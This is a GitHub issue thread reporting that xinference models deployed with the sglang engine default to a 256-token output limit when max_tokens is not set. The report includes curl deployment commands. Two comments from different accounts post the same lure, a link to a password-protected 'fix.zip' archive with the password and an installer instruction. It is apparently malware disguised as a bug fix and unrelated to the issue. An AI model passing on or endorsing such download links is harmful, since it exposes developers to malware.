### ISSUE TITLE
通过sglang部署的模型，v1/chat/completion请求中若不指定max_tokens，最大输出token数量为256

### ISSUE THREAD

**Issue by 315930399** [xorbitsai/inference#2160]
### System Info / 系統信息

xinference 0.14.2

### Running Xinference with Docker? / 是否使用 Docker 运行 Xinfernece？

- [ ] docker / docker
- [x] pip install / 通过 pip install 安装
- [ ] installation from source / 从源码安装

### Version info / 版本信息

xinference 0.14.2

### The command used to start Xinference / 用以启动 xinference 的命令

模型部署命令
```
curl --request POST \
  --url http://xxx:xxx/v1/models \
  --header 'content-type: application/json' \
  --data '{
    "model_name": "qwen2-instruct",
    "model_uid": "xxx",
    "model_engine": "sglang",
    "model_path": "/xxx",
    "gpu_idx": [xxx],
    "worker_ip": "xxx"
}'
```

### Reproduction / 复现过程

模型部署命令
```
curl --request POST \
  --url http://xxx:xxx/v1/models \
  --header 'content-type: application/json' \
  --data '{
    "model_name": "qwen2-instruct",
    "model_uid": "xxx",
    "model_engine": "sglang",
    "model_path": "/xxx",
    "gpu_idx": [xxx],
    "worker_ip": "xxx"
}'
```

### Expected behavior / 期待表现

不指定max_token时，不设默认值

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
